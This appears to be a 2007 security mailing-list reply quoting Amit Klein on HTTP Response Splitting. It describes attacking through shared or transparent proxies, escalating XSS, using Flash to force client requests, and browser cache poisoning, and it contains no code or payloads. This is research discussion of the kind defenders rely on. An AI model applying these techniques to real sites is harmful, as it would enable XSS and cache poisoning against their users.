Few more comments..
Amit Klein wrote:
> If this is a public site, and people access it through a forward proxy
> (as I've seen several ISPs, universities, etc. force their clients to
> do), or a transparent proxy (ditto), then the attacker doesn't have to
> run malicious code on the client - the attacker can mount the attack
> directly, through the proxy (assuming the attacker has "legit" access to
> the same proxy). That's assuming at least one of the vulnerable scripts
> can be accessed over port 80 (non-HTTPS).
>
> Moreover, even if the attacker cannot access the proxy server (or the
> whose site must be accessed over HTTPS), HTTP Response Splitting can be
> used to elevate an existing XSS problem into something bigger (see the
> paper, pages 21-22).
>
>
And even if the attacker doesn't have direct access to the proxy, he/she
can force the client to conduct the attack, using Flash ("Sending
arbitrary HTTP requests with Flash 7/8 (+IE 6.0)",
http://www.securityfocus.com/archive/1/443391).
>> Sure you can split the response. But what exactly are you going to do
>> with the second one?
>>
>
> You can do XSS. See the paper - p.4 and pages 19-21.
>
>
And browser cache poisoning too.
-------------------------------------------------------------------------
Sponsored by: Watchfire
Cross-Site Scripting (XSS) is one of the most common application-level
attacks that hackers use to sneak into web applications today. This
whitepaper will discuss how traditional XSS attacks are performed, how to
secure your site against these attacks and check if your site is protected.
Cross-Site Scripting Explained - Download this whitepaper today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=701500000008fHA
--------------------------------------------------------------------------
Received on Apr 20 2007
Intro
